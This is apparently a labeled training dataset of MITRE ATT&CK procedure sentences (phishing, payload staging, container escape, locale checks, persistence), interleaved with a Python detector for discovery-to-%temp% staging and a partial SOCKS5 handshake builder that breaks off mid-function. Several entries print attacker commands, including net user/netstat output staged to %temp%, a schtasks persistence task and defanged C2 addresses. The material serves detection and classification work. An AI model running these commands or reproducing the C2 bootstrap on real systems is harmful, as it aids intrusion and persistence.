{"text1":"APT32 has used malicious links to direct users to web pages designed to harvest credentials.","labels":"['T1598.003']"}
|
|
{"text1":"Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.","labels":"['T1598.003']"}
|
|
{"text1":"Kimsuky has used links in e-mail to steal account information.","labels":"['T1598.003']"}
|
|
{"text1":"Magic Hound has used SMS and email messages with links designed to steal credentials.","labels":"['T1598.003']"}
|
|
{"text1":"SMOKEDHAM has been delivered via malicious links in phishing emails.","labels":"['T1598.003']"}
|
|
{"text1":"Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.","labels":"['T1598.003']"}
|
|
{"text1":"Sidewinder has sent e-mails with malicious links to credential harvesting websites.","labels":"['T1598.003']"}
|
|
{"text1":"Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.","labels":"['T1598.003']"}
|
|
{"text1":"SYNful Knock is malware that is inserted into a network device by patching the operating system image.","labels":"['T1601.001']"}
|
|
{"text1":"APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.","labels":"['T1606.001']"}
|
|
{"text1":"AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.","labels":"['T1606.002']"}
|
|
{"text1":"APT29 created tokens using compromised SAML signing certificates.","labels":"['T1606.002']"}
|
|
{"text1":"UNC2452 created tokens using compromised SAML signing certificates.","labels":"['T1606.002']"}
|
|
{"text1":"Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.","labels":"['T1608']"}
|
|
{"text1":"APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.","labels":"['T1608.001']"}
|
|
{"text1":"BITTER has registered domains to stage payloads.","labels":"['T1608.001']"}
|
|
{"text1":"During Night Dragon, threat actors uploaded commonly available hacker tools to compromised web servers.","labels":"['T1608.001']"}
|
|
{"text1":"EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.","labels":"['T1608.001']"}
|
|
{"text1":"Earth Lusca has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.","labels":"['T1608.001']"}
|
|
{"text1":"For C0011, Transparent Tribe hosted malicious documents on domains registered by the group.","labels":"['T1608.001']"}
|
|
{"text1":"For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites.","labels":"['T1608.001']"}
|
|
{"text1":"For Operation Spalax, the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.","labels":"['T1608.001']"}
|
|
{"text1":"Gamaredon Group has registered domains to stage payloads.","labels":"['T1608.001']"}
|
|
{"text1":"HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations.","labels":"['T1608.001']"}
|
|
{"text1":"Kimsuky has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants.","labels":"['T1608.001']"}
|
|
{"text1":"Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.","labels":"['T1608.001']"}
|
|
{"text1":"LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub.","labels":"['T1608.001']"}
|
|
{"text1":"SideCopy has used compromised domains to host its malicious payloads.","labels":"['T1608.001']"}
|
|
{"text1":"TA505 has staged malware on actor-controlled domains.","labels":"['T1608.001']"}
|
|
{"text1":"TeamTNT has uploaded backdoored Docker images to Docker Hub.","labels":"['T1608.001']"}
|
|
{"text1":"Threat Group-3390 has hosted malicious payloads on Dropbox.","labels":"['T1608.001']"}
|
|
{"text1":"For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.","labels":"['T1608.002']"}
|
|
{"text1":"Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.","labels":"['T1608.002']"}
|
|
{"text1":"Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.","labels":"['T1608.002']"}
|
|
{"text1":"Dragonfly has compromised websites to redirect traffic and to host exploit kits.","labels":"['T1608.004']"}
|
|
{"text1":"For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.","labels":"['T1608.004']"}
|
|
{"text1":"Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.","labels":"['T1608.004']"}
|
|
{"text1":"Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.","labels":"['T1608.004']"}
|
|
{"text1":"Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites.","labels":"['T1608.005']"}
|
|
{"text1":"Hildegard was executed through the kubelet API run command and by executing commands on running containers.","labels":"['T1609']"}
|
|
{"text1":"Kinsing was executed with an Ubuntu container entry point that runs shell scripts.","labels":"['T1609']"}
|
|
{"text1":"Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.","labels":"['T1609']"}
|
|
{"text1":"Kinsing was run through a deployed Ubuntu container.","labels":"['T1610']"}
|
|
{"text1":"Peirates can deploy a pod that mounts its node\u2019s root file system, then execute a command to create a reverse shell on the node.","labels":"['T1610']"}
|
|
{"text1":"TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.","labels":"['T1610']"}
|
|
{"text1":"Doki\u2019s container was configured to bind the host root directory.","labels":"['T1611']"}
|
|
{"text1":"Hildegard has used the BOtB tool that can break out of containers.","labels":"['T1611']"}
|
|
{"text1":"Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.","labels":"['T1611']"}
|
|
{"text1":"TeamTNT has deployed privileged containers that mount the filesystem of the victim machine.","labels":"['T1611']"}
|
|
{"text1":"Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.","labels":"['T1613']"}
|
|
{"text1":"TeamTNT has checked for running containers with \"docker ps\" and for specific container names with \"docker inspect\". TeamTNT has also searched for Kubernetes pods running in a local network.","labels":"['T1613']"}
|
|
{"text1":"Crimson can identify the geographical location of a victim host.","labels":"['T1614']"}
|
|
{"text1":"GrimAgent can identify the country code on a compromised host.","labels":"['T1614']"}
|
|
{"text1":"QuasarRAT can determine the country a victim host is located in.","labels":"['T1614']"}
|
|
{"text1":"SDBbot can collect the country code of a compromised machine.","labels":"['T1614']"}
|
|
{"text1":"Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.","labels":"['T1614']"}
|
|
{"text1":"Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the \"GetTextCharset\" function.","labels":"['T1614.001']"}
|
|
{"text1":"Flagpro can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialogs.","labels":"['T1614.001']"}
|
|
{"text1":"GrimAgent has used \"Accept-Language\" to identify hosts in the United Kingdom, United States, France, and Spain.","labels":"['T1614.001']"}
|
|
{"text1":"Ke3chang has used implants to collect the system language ID of a compromised machine.","labels":"['T1614.001']"}
|
|
{"text1":"Lazarus Group has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.","labels":"['T1614.001']"}
|
|
{"text1":"Maze has checked the language of the machine with function \"GetUserDefaultUILanguage\" and terminated execution if the language matches with an entry in the predefined list.","labels":"['T1614.001']"}
|
|
{"text1":"Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.","labels":"['T1614.001']"}
|
|
{"text1":"Neoichor can identify the system language on a compromised host.","labels":"['T1614.001']"}
|
|
{"text1":"Ryuk has been observed to query the registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\" and the value \"InstallLanguage\". If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution.","labels":"['T1614.001']"}
|
|
{"text1":"SharpStage has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.","labels":"['T1614.001']"}
|
|
{"text1":"Some versions of DEATHRANSOM have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar DEATHRANSOM would exit.","labels":"['T1614.001']"}
|
|
{"text1":"Spark has checked the results of the \"GetKeyboardLayoutList\" and the language name returned by \"GetLocaleInfoA\" to make sure they contain the word \u201cArabic\u201d before executing.","labels":"['T1614.001']"}
|
|
{"text1":"XCSSET uses AppleScript to check the host's language and location with the command \"user locale of (get system info)\".","labels":"['T1614.001']"}
|
|
{"text1":"Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.","labels":"['T1614.001']"}
|
|
{"text1":"Emissary has the capability to execute \"gpresult\".","labels":"['T1615']"}
|
|
{"text1":"Empire includes various modules for enumerating Group Policy.","labels":"['T1615']"}
|
|
{"text1":"Turla surveys a system upon check-in to discover Group Policy details using the \"gpresult\" command.","labels":"['T1615']"}
|
|
{"text1":"Cobalt Strike's \"execute-assembly\" command can run a .NET executable within the memory of a sacrificial process by loading the CLR.","labels":"['T1620']"}
|
|
{"text1":"Cuba loaded the payload into memory using PowerShell.","labels":"['T1620']"}
|
|
{"text1":"Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.","labels":"['T1620']"}
|
|
{"text1":"FoggyWeb's loader has reflectively loaded .NET-based assembly\/payloads into memory.","labels":"['T1620']"}
|
|
{"text1":"Gelsemium can use custom shellcode to map embedded DLLs into memory.","labels":"['T1620']"}
|
|
{"text1":"IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.","labels":"['T1620']"}
|
|
{"text1":"Lazarus Group has changed memory protection permissions then overwritten in-memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.","labels":"['T1620']"}
|
|
{"text1":"PowerSploit reflectively loads a Windows PE file into a process.","labels":"['T1620']"}
|
|
{"text1":"APT29 has used repeated MFA requests to gain access to victim accounts.","labels":"['T1621']"}
|
|
{"text1":"LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.","labels":"['T1621']"}
|
|
{"text1":"ROKRAT can check for debugging tools.","labels":"['T1622']"}
|
|
{"text1":"Saint Bot has used `is_debugger_present` as part of its environmental checks.","labels":"['T1622']"}
|
|
{"text1":"ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" and checks the returned process flags for \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PT_DENY_ATTACH\" request to prevent a debugger from attaching.","labels":"['T1622']"}
|
|
{"text1":"XCSSET uses the \"plutil\" command to modify the \"LSUIElement\", \"CFBundleDisplayName\", and \"CFBundleIdentifier\" keys in the \"\/Contents\/Info.plist\" file to change how XCSSET is visible on the system.","labels":"['T1647']"}
|
|
{"text1":"AADInternals can create and export various authentication certificates, including those associated with Azure AD joined\/registered devices.","labels":"['T1649']"}
|
|
{"text1":"APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.","labels":"['T1649']"}
|
|
{"text1":"Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.","labels":"['T1649']"}
|
|
{"text1":"creates a backdoor through which remote attackers can steal system information.","labels":"['T1005', 'T1005']"}
|
|
{"text1":"captures window titles.","labels":"['T1010', 'T1010']"}
|
|
{"text1":"hides any strings related to its own indicators of compromise.","labels":"['T1027', 'T1027']"}
|
|
{"text1":"creates a backdoor through which remote attackers can open a command-line interface.","labels":"['T1059', 'T1059']"}
|
|
{"text1":"stages collected data in a text file.","labels":"['T1074', 'T1074']"}
|
|
{"text1":"can download and execute a second-stage payload.","labels":"['T1105', 'T1105']"}
|
|
{"text1":"creates a backdoor through which remote attackers can upload files.","labels":"['T1105', 'T1105']"}
|
|
{"text1":"creates a Registry subkey that registers a new system device.","labels":"['T1112', 'T1112']"}
|
|
{"text1":"At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse","labels":"['T1564.001', 'T1564.001']"}
|
|
{"text1":"If the user clicks on the link, they are prompted to download a RAR file that contains the stage 1 malware\/lure, which they then execute","labels":"['T1204.002', 'T1105']"}
|
|
{"text1":"For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP","labels":"['T1071.001', 'T1041', 'T1071', 'T1132']"}
|
|
{"text1":"The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs","labels":"['T1056.001', 'T1056']"}
|
|
{"text1":"f) Hadoop YARN ResourceManager \u2013 Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability","labels":"['T1203', 'T1203', 'T1105']"}
|
|
{"text1":"The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems","labels":"['T1053.005', 'T1053', 'T1053.005']"}
|
|
{"text1":"\"beacon\" payload can collect information on process details.","labels":"['T1057']"}
|
|
{"text1":"\"beacon\" payload can receive C2 from one protocol and respond on another. This is typically a mixture of HTTP, HTTPS, and DNS traffic.","labels":"['T1026']"}
|
|
{"text1":"\"beacon\" payload is capable of capturing screen shots.","labels":"['T1113']"}
|
|
{"text1":"2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.","labels":"['T1070.004']"}
|
|
{"text1":"A .dll file is digitally signed by a certificate from AirVPN.","labels":"['T1553.002']"}
|
|
{"text1":"A .dll that contains is loaded and executed using DLL side-loading.","labels":"['T1574.002']"}
|
|
{"text1":"A 2 plug-in uses WMI to gather victim host details.","labels":"['T1047']"}
|
|
{"text1":"A backdoor used by created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.","labels":"['T1090.003']"}
|
|
{"text1":"abuses NTFS transactions to launch and conceal malicious processes.","labels":"['T1055.013']"}
|
|
{"text1":"abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.","labels":"['T1574.001']"}
|
|
{"text1":"accessed email accounts using Outlook Web Access.","labels":"['T1114']"}
|
|
{"text1":"accesses network share(s), enables share access to the target device, and copies an executable payload to the target system, and uses a to execute the malware.","labels":"['T1021.002']"}
|
|
{"text1":"accesses the HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.","labels":"['T1012']"}
|
|
{"text1":"achieves persistence by adding a shortcut of itself to the startup path in the Registry.","labels":"['T1547.001']"}
|
|
{"text1":"achieves persistence by adding itself to the HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"achieves persistence by creating a Registry entry in HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.","labels":"['T1547.001']"}
|
|
{"text1":"achieves persistence by creating a shortcut in the current user's Startup folder.","labels":"['T1547.009', 'T1547.001']"}
|
|
{"text1":"achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.","labels":"['T1547.009', 'T1547.001']"}
|
|
{"text1":"achieves persistence by making an entry in the Registry's Run key.","labels":"['T1547.001']"}
|
|
{"text1":"achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.","labels":"['T1547.001']"}
|
|
{"text1":"actors have been known to copy files to the network shares of other computers to move laterally.","labels":"['T1021.002']"}
|
|
{"text1":"actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.","labels":"['T1546.008']"}
|
|
{"text1":"actors have split RAR files for exfiltration into parts.","labels":"['T1030']"}
|
|
{"text1":"actors have used and a modified version of called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.","labels":"['T1003']"}
|
|
{"text1":"actors have used DLL side-loading. Actors have used legitimate Kaspersky anti-virus variants in which the DLL acts as a stub loader that loads and executes the shell code.","labels":"['T1574.002']"}
|
|
{"text1":"actors leverage legitimate credentials to log into external remote services.","labels":"['T1078', 'T1133']"}
|
|
{"text1":"actors obtained a list of active processes on the victim and sent them to C2 servers.","labels":"['T1057']"}
|
|
{"text1":"actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.","labels":"['T1078']"}
|
|
{"text1":"actors spawned shells on remote systems on a victim network to execute commands.","labels":"['T1059']"}
|
|
{"text1":"actors used compromised credentials for the victim's endpoint management platform, Altiris, to move laterally.","labels":"['T1078']"}
|
|
{"text1":"actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.","labels":"['T1078']"}
|
|
{"text1":"actors used the following command following exploitation of a machine with malware to display network connections: netstat -ano >> %temp%\\download","labels":"['T1049']"}
|
|
{"text1":"actors used the following command following exploitation of a machine with malware to obtain information about services: net start >> %temp%\\download","labels":"['T1007']"}
|
|
{"text1":"actors used the following commands after exploiting a machine with malware to obtain information about files and directories: dir c:\\ >> %temp%\\download dir \"c:\\Documents and Settings\" >> %temp%\\download dir \"c:\\Program Files\\\" >> %temp%\\download dir d:\\ >> %temp%\\download","labels":"['T1083']"}
|
|
{"text1":"actors used the following commands following exploitation of a machine with malware to enumerate user accounts: net user >> %temp%\\download net user \/domain >> %temp%\\download","labels":"['T1087']"}
|
|
{"text1":"actors used the following command to rename one of their tools to a benign file name: ren \"%temp%\\upload\" audiodg.exe","labels":"['T1036']"}
|
|
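The five command-line entries above (netstat, net start, dir, net user, ren) are individually unremarkable; what makes them worth alerting on is the chain: several different discovery commands appended, one after another, to the same file under %temp%, followed by a staged tool being renamed to a Windows binary name. The Python below is an added example, not part of the dataset or of any referenced report, showing how to score that chain from process-creation records. The record shape (`host`, `user`, `cmd` fields, as one would extract from Security event 4688 or Sysmon event 1), the constructed sample events and the threshold of two distinct discovery techniques are all assumptions for the illustration.

```python
"""Detect the discovery-to-%temp% staging chain described in the entries above.

Added example (not from the original dataset).  Input records are assumed to be
process-creation events reduced to host, user and command line.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

SessionKey = Tuple[str, str]  # (host, user)

# Discovery commands seen in the entries above, mapped to ATT&CK technique IDs.
DISCOVERY_COMMANDS = [
    (re.compile(r"^\s*netstat\b", re.I), "T1049"),
    (re.compile(r"^\s*net\s+start\b", re.I), "T1007"),
    (re.compile(r"^\s*net\s+user\b", re.I), "T1087"),
    (re.compile(r"^\s*dir\b", re.I), "T1083"),
]

# Append-redirect into the user's temp directory, whether the log preserves the
# literal %temp% or records the expanded ...\AppData\Local\Temp path.
_TEMP_DIR = r"(?:%temp%|[a-z]:\\users\\[^\\]+\\appdata\\local\\temp)"
TEMP_APPEND = re.compile(r">>\s*\"?" + _TEMP_DIR + r"\\(?P<file>[^\s\"]+)", re.I)

# 'ren "%temp%\upload" audiodg.exe': a staged tool renamed to a benign binary name.
TEMP_RENAME = re.compile(
    r"^\s*ren(?:ame)?\s+\"?" + _TEMP_DIR + r"\\[^\s\"]+\"?\s+(?P<target>[\w.-]+)", re.I
)

# Constructed sample events (not real telemetry).  WS01 reproduces the chain in
# the entries above; WS02 is an administrator running similar commands normally;
# WS03 shows the same chain with the expanded temp path.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "jdoe", "cmd": r"netstat -ano >> %temp%\download"},
    {"host": "WS01", "user": "jdoe", "cmd": r"net start >> %temp%\download"},
    {"host": "WS01", "user": "jdoe", "cmd": r'dir "c:\Documents and Settings" >> %temp%\download'},
    {"host": "WS01", "user": "jdoe", "cmd": r"net user /domain >> %temp%\download"},
    {"host": "WS01", "user": "jdoe", "cmd": r'ren "%temp%\upload" audiodg.exe'},
    {"host": "WS02", "user": "admin", "cmd": r"netstat -ano"},
    {"host": "WS02", "user": "admin", "cmd": r"dir c:\ > C:\Users\admin\listing.txt"},
    {"host": "WS03", "user": "svc", "cmd": r"netstat -ano >> C:\Users\svc\AppData\Local\Temp\download"},
    {"host": "WS03", "user": "svc", "cmd": r"net user >> C:\Users\svc\AppData\Local\Temp\download"},
]


def analyze(events: Iterable[dict]) -> Dict[SessionKey, dict]:
    """Aggregate per (host, user): discovery techniques whose output was appended
    under %temp%, the staging file names used, and any temp-file renames."""
    sessions: Dict[SessionKey, dict] = defaultdict(
        lambda: {"techniques": set(), "staging_files": set(), "masqueraded_as": []}
    )
    for ev in events:
        session = sessions[(ev["host"], ev["user"])]
        cmd = ev["cmd"]
        append = TEMP_APPEND.search(cmd)
        if append:  # only count discovery whose output is staged in %temp%
            for pattern, technique in DISCOVERY_COMMANDS:
                if pattern.search(cmd):
                    session["techniques"].add(technique)
                    session["staging_files"].add(append.group("file").lower())
        rename = TEMP_RENAME.search(cmd)
        if rename:
            session["masqueraded_as"].append(rename.group("target"))
    return dict(sessions)


def flag_sessions(events: Iterable[dict], min_techniques: int = 2) -> List[SessionKey]:
    """Sessions with >= min_techniques distinct discovery techniques staged to
    %temp%, or any temp-file rename, sorted for stable output."""
    flagged = [
        key
        for key, s in analyze(events).items()
        if len(s["techniques"]) >= min_techniques or s["masqueraded_as"]
    ]
    return sorted(flagged)


if __name__ == "__main__":
    for key, summary in analyze(SAMPLE_EVENTS).items():
        print(key, sorted(summary["techniques"]), summary["staging_files"], summary["masqueraded_as"])
    print("flagged:", flag_sessions(SAMPLE_EVENTS))
```

Requiring the `>>` redirect into the temp directory is what keeps the administrator on WS02 out of the result set while still catching the chain whether the path is logged expanded or not; lowering `min_techniques` to 1 trades that precision for earlier alerting.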
{"text1":"actors used the native Windows task scheduler tool to use scheduled tasks for execution on a victim network.","labels":"['T1053.005']"}
|
|
{"text1":"actors use nbtscan to discover vulnerable systems.","labels":"['T1016']"}
|
|
{"text1":"actors use the Hunter tool to conduct network service discovery for vulnerable systems.","labels":"['T1046']"}
|
|
{"text1":"actors use to schedule tasks to run self-extracting RAR archives, which install or on other victims on a network.","labels":"['T1053.005']"}
|
|
{"text1":"added \"junk data\" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a \"junk length\" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.","labels":"['T1001']"}
|
|
{"text1":"added junk data to outgoing UDP packets to peer implants.","labels":"['T1001']"}
|
|
{"text1":"added newly created accounts to the administrators group to maintain elevated access.","labels":"['T1098']"}
|
|
{"text1":"added Registry Run keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"adds a .lnk file to the Windows startup folder.","labels":"['T1547.009']"}
|
|
{"text1":"adds a .plist file to the \/Library\/LaunchAgents folder to maintain persistence.","labels":"['T1543.001']"}
|
|
{"text1":"adds an entry to the rc.common file for persistence.","labels":"['T1037.004']"}
|
|
{"text1":"adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.","labels":"['T1036']"}
|
|
{"text1":"adds a new service named NetAdapter to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"adds a Registry Run key for ctfmon.exe to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.","labels":"['T1547.001']"}
|
|
{"text1":"adds a Registry Run key to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"adds Registry Run keys to achieve persistence.","labels":"['T1547.001']"}
|
|
{"text1":"A Destover-like implant used by can obtain the current system time and send it to the C2 server.","labels":"['T1124']"}
|
|
{"text1":"A Destover-like variant used by uses a batch file mechanism to delete its binaries from the system.","labels":"['T1064']"}
|
|
{"text1":"A dropper used by installs itself into the ASEP Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with a value named McUpdate.","labels":"['T1547.001']"}
|
|
{"text1":"Adversaries can instruct to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.","labels":"['T1053.005', 'T1021.002', 'T1078']"}
|
|
{"text1":"A file stealer can communicate over HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"A file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.","labels":"['T1082']"}
|
|
{"text1":"A file stealer can gather the victim's username to send to a C2 server.","labels":"['T1033']"}
|
|
{"text1":"A file stealer can run a TaskScheduler DLL to add persistence.","labels":"['T1053.005']"}
|
|
{"text1":"A file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.","labels":"['T1025']"}
|
|
{"text1":"A file stealer transfers collected files to a hardcoded C2 server.","labels":"['T1041']"}
|
|
{"text1":"After collecting files and logs from the victim, encrypts some collected data with Blowfish.","labels":"['T1486']"}
|
|
{"text1":"After compromising a victim, lists all running processes.","labels":"['T1057']"}
|
|
{"text1":"After copying itself to a DLL file, a variant of calls the DLL file using rundll32.exe.","labels":"['T1218.011']"}
|
|
{"text1":"After decrypting itself in memory, downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This \u201cdownloaded\u201d file is actually not dropped onto the system.","labels":"['T1055']"}
|
|
{"text1":"After downloading its main config file, downloads multiple payloads from C2 servers.","labels":"['T1105']"}
|
|
{"text1":"After encrypting C2 data, converts it into a hexadecimal representation and then encodes it into base64.","labels":"['T1001']"}
|
|
{"text1":"After encrypting log files, the log encryption module in deletes the original, unencrypted files from the host.","labels":"['T1070']"}
|
|
{"text1":"After initial compromise, will download a second stage to establish a more permanent presence on the affected system.","labels":"['T1104']"}
|
|
{"text1":"After using raw sockets to communicate with its C2 server, uses a decrypted string to create HTTP POST requests.","labels":"['T1071']"}
|
|
{"text1":"aggregates collected data in a tmp file.","labels":"['T1074']"}
|
|
{"text1":"A implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.","labels":"['T1036']"}
|
|
{"text1":"A Javascript backdoor added a local_update_check value under the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish persistence. Additionally, a custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.","labels":"['T1547.001']"}
|
|
{"text1":"A JavaScript backdoor has used Google Apps Script as its C2 server.","labels":"['T1102']"}
|
|
{"text1":"A keylogging tool used by gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.","labels":"['T1016']"}
|
|
{"text1":"A Linux version of checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. also gathers the username of the victim.","labels":"['T1033']"}
|
|
{"text1":"allows actors to spawn a reverse shell on a victim.","labels":"['T1059']"}
|
|
{"text1":"allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.","labels":"['T1083']"}
|
|
{"text1":"allows adversaries to execute shell commands on the infected host.","labels":"['T1059']"}
|
|
{"text1":"allows adversaries to modify the way the \"beacon\" payload communicates. This is called \"Malleable C2\" in the manual and is intended to allow a penetration test team to mimic known APT C2 methods.","labels":"['T1095']"}
|
|
{"text1":"allows adversaries to search for files.","labels":"['T1083']"}
|
|
{"text1":"A macro deletes files after it has decoded and decompressed them.","labels":"['T1070.004']"}
|
|
{"text1":"A malware sample adds persistence on the system by creating a shortcut in the user\u2019s Startup folder.","labels":"['T1547.009']"}
|
|
{"text1":"A malware sample encodes data with base64.","labels":"['T1132']"}
|
|
{"text1":"A malware sample performs reflective DLL injection.","labels":"['T1055']"}
|
|
{"text1":"A module has a default C2 port of 13000.","labels":"['T1571']"}
|
|
{"text1":"A module in collects information from the victim about installed anti-virus software.","labels":"['T1518.001']"}
|
|
{"text1":"A module in collects information from the victim about its IP addresses and MAC addresses.","labels":"['T1016']"}
|
|
{"text1":"A module in collects information from the victim about the current user name.","labels":"['T1033']"}
|
|
{"text1":"A module in collects information from the victim about Windows OS version, computer name, battery info, and physical memory.","labels":"['T1082']"}
|
|
{"text1":"A module in collects information on available printers and disk drives.","labels":"['T1120']"}
|
|
{"text1":"An backdoor may collect the entire contents of an inserted USB device.","labels":"['T1025']"}
|
|
{"text1":"An downloader creates persistence by creating the following scheduled task: schtasks \/create \/tn \"mysc\" \/tr C:\\Users\\Public\\test.exe \/sc ONLOGON \/ru \"System\".","labels":"['T1053.005']"}
|
|
{"text1":"An downloader establishes SOCKS5 connections for its initial C2.","labels":"['T1090', 'T1095']"}
|
|
{"text1":"An downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.","labels":"['T1104']"}
|
|
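The two downloader entries above describe a SOCKS5 bootstrap: a greeting and method negotiation with the proxy on one port, then a CONNECT request for the real C2 address. The Python below is an added example, not code from the downloader or from the dataset, that builds and parses exactly those RFC 1928 messages so that both sides of the exchange can be reproduced or recognised in a capture. The function names are my own, the `run_handshake` callables stand in for a socket, and the addresses in the `__main__` block are RFC 5737 documentation ranges rather than the infrastructure quoted above.

```python
"""SOCKS5 greeting / CONNECT exchange as described in the entries above.

Added example (not from the original dataset).  Message layouts follow
RFC 1928; the send/recv callables abstract the transport so the exchange
can be driven offline or over a real socket.
"""
import ipaddress
import struct
from typing import Callable, Sequence, Tuple

SOCKS_VERSION = 5
METHOD_NO_AUTH = 0x00
METHOD_NONE_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def client_greeting(methods: Sequence[int] = (METHOD_NO_AUTH,)) -> bytes:
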